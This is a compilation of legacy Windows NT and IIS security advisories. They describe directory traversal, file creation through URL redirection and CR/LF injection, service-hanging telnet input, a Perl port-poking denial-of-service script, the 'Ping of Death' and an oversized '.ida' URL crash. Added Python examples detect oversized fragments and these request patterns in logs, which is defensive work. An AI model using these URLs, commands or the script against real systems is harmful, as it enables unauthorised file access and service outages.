Affected systems: NT 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default the user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
--------------------------------------------------------------------

Affected systems: NT 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' already exists, it will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.
----------------------------------------------------------------------

Affected systems: NT 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than the usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings on the NTsecurity@iss.net list to test the ports on your own system (Perl is available from the NT Resource Kit):

# begin poke code

use Socket;
use FileHandle;
require "chat2.pl";            # chat2.pl ships with the Perl distribution

$systemname = shift;           # server name taken from the command line
die "usage: perl poke servername\n" unless defined $systemname;

$verbose = 1;                  # tell me what you're hitting
$knownports = 1;               # don't hit known problem ports

for ($port = 1; $port < 65535; $port++)
{
    # skip the ports already known to confuse the services listening on them
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;           # nothing listening on this port
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

# end poke code
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: NT 4.0
Using a telnet application to connect to a webserver on HTTP port 80 and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

Affected systems: NT 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.
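The following is an added example, not part of the original advisory: a per-fragment check for the Ping of Death condition described above, that is, an IP fragment whose offset plus length would reassemble to more than the 65535-byte IPv4 limit. The fragments are constructed for the example from the advisory's 'PING -l 65527' case (8-byte ICMP header plus 65527 data bytes); the packet identifier, TTL and addresses are made-up placeholders, and MTU 1500 is an assumption.

```python
"""Flag IPv4 fragments that would reassemble past 65535 bytes (Ping of Death check)."""
import struct

IPV4_MAX_DATAGRAM = 65535   # limit of the 16-bit total-length field
MF_FLAG = 0x2000            # "more fragments" bit in the flags/offset field
OFFSET_MASK = 0x1FFF        # 13-bit fragment offset, counted in 8-byte units


def build_fragment(ident, offset_units, more_fragments, payload_len, proto=1):
    """Construct a minimal IPv4 fragment: 20-byte header plus a zeroed payload.

    Constructed packet for this example, not a capture. Addresses are from the
    documentation range (192.0.2.0/24); checksum is left at zero.
    """
    flags_offset = (MF_FLAG if more_fragments else 0) | (offset_units & OFFSET_MASK)
    total_len = 20 + payload_len
    header = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, total_len, ident, flags_offset, 64, proto, 0,
        bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2]),
    )
    return header + bytes(payload_len)


def fragment_reassembles_oversize(packet):
    """True if this fragment's offset + length would push the datagram past 65535 bytes.

    The check needs only the fragment's own header, so a filter can drop the
    offending fragment without buffering the rest of the datagram.
    """
    ihl = (packet[0] & 0x0F) * 4
    total_len, _ident, flags_offset = struct.unpack("!HHH", packet[2:8])
    payload_len = total_len - ihl
    offset_bytes = (flags_offset & OFFSET_MASK) * 8
    return ihl + offset_bytes + payload_len > IPV4_MAX_DATAGRAM


def fragment_ping(icmp_data_len, mtu=1500):
    """Split an ICMP echo carrying icmp_data_len data bytes into IPv4 fragments for the MTU."""
    ip_payload = 8 + icmp_data_len          # 8-byte ICMP header + data
    per_frag = ((mtu - 20) // 8) * 8        # non-final fragment payloads are multiples of 8
    frags = []
    offset = 0
    while offset < ip_payload:
        chunk = min(per_frag, ip_payload - offset)
        more = offset + chunk < ip_payload
        frags.append(build_fragment(0x1234, offset // 8, more, chunk))
        offset += chunk
    return frags


def oversize_fragment_count(fragments):
    """Number of fragments a filter would drop under the check above."""
    return sum(1 for f in fragments if fragment_reassembles_oversize(f))


if __name__ == "__main__":
    for data_len in (32, 65507, 65527):
        frags = fragment_ping(data_len)
        print(f"ping -l {data_len}: {len(frags)} fragments, "
              f"{oversize_fragment_count(frags)} oversize")
```

With 65507 data bytes (the largest echo that still fits in a 65535-byte datagram) every fragment passes; with the advisory's 65527 only the final fragment is flagged, because its offset (65120) plus its 415 bytes plus the 20-byte header exceeds the limit.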
--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively a denial of service against the server). All IIS versions up to and including IIS 5.0 are vulnerable. When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be made to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existent file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like 'The IDQ d:\http\anything.idq could not be found'. Such a response lets him learn more about how the web site is organized and the directory structure of the server.
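The following is an added example, not part of the original advisory: a small Python checker that flags, in web server request lines, the request patterns this page describes, namely the '..\..' and 'scripts..\..' traversal, the '>PATH\target.bat' redirection and the '%0A%0D' CR/LF injection, the 'GET ../..' crash request, the 25 KB '.ida' URL, and the '.ida'/'.idq' path-disclosure probes. The sample request lines and the MAX_PATH_LEN threshold are constructed for the example and are not taken from any real log.

```python
"""Flag IIS-era URL abuse patterns in request lines ("METHOD path")."""
import re
from urllib.parse import unquote

# Constructed sample request lines for this example (not from a real server log).
SAMPLE_REQUESTS = [
    "GET /default.htm",
    "GET /..\\..\\somefile.txt",
    "GET /scripts..\\..\\scriptname",
    "GET /scripts/exploit.bat>c:\\somewhere\\target.bat",
    "GET /scripts/script_name%0A%0D>c:\\somewhere\\target.bat",
    "GET ../..",
    "GET /" + "." * 25000 + "ida",
    "GET /anything.idq",
    "GET /docs/%2e%2e/%2e%2e/private.txt",
]

# Assumed threshold: anything longer is treated as an over-long URL probe.
MAX_PATH_LEN = 4096


def normalise(path):
    """URL-decode once and fold NT backslashes to forward slashes.

    Decoding exposes %2e%2e (dot-dot) and %0A%0D (LF/CR); folding backslashes
    lets one traversal rule cover both '..\\..' and '../..'. A single decode is
    an assumption; a server that decodes twice would need a second pass.
    """
    return unquote(path).replace("\\", "/")


RULES = [
    # '..' as a segment, or glued to a name ('scripts..'), followed by a separator or the end
    ("traversal", lambda p: re.search(r"\.\.(/|$)", p) is not None),
    # raw CR or LF inside the path, as injected with %0A%0D
    ("crlf", lambda p: "\r" in p or "\n" in p),
    # '>' in the path: redirection that would create or truncate a file on the server
    ("redirect", lambda p: ">" in p),
    # .ida / .idq requests: the Index Server handlers that disclose physical paths
    ("ida_idq", lambda p: re.search(r"\.id[aq]$", p, re.IGNORECASE) is not None),
    # absurdly long path, e.g. the 25 KB run of dots from the IIS 5.0 '.ida' crash
    ("overlong", lambda p: len(p) > MAX_PATH_LEN),
]


def inspect_request(line):
    """Return (method, raw_path, list of rule names that fired) for one request line."""
    method, _, raw_path = line.partition(" ")
    decoded = normalise(raw_path)
    hits = [name for name, check in RULES if check(decoded)]
    return method, raw_path, hits


def scan(lines):
    """Return only the flagged requests as (raw_path, hits) pairs."""
    flagged = []
    for line in lines:
        _, raw_path, hits = inspect_request(line)
        if hits:
            flagged.append((raw_path, hits))
    return flagged


if __name__ == "__main__":
    for raw_path, hits in scan(SAMPLE_REQUESTS):
        shown = raw_path if len(raw_path) <= 60 else raw_path[:57] + "..."
        print(f"{', '.join(hits):20} {shown}")
```

Run as-is it prints the eight flagged sample lines; in practice feed it the cs-uri-stem and cs-uri-query fields from the IIS log. Matching happens after decoding and backslash folding, so '%2e%2e/', '..\..' and 'scripts..\..' all trip the same traversal rule, and the '%0A%0D>' request trips both the CR/LF and the redirection rules.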